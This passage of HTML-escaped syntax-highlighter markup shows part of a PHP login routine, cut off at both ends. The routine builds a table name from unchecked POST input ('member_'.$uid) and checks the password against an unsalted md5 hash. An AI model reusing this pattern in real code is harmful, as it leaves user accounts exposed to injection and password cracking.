font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_POST&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'uid'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-38&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$upw&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_POST&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'upw'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-39&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uid&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$upw&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-40&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;include&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;dbconn.php&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-41&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbSql&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;select&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;member_&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uid&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;pw&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;md5&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$upw&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-42&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;is_string&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;login fail&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-43&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_SESSION&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'uid'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'0'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-44&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_SESSION&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'lvl'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'4'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; 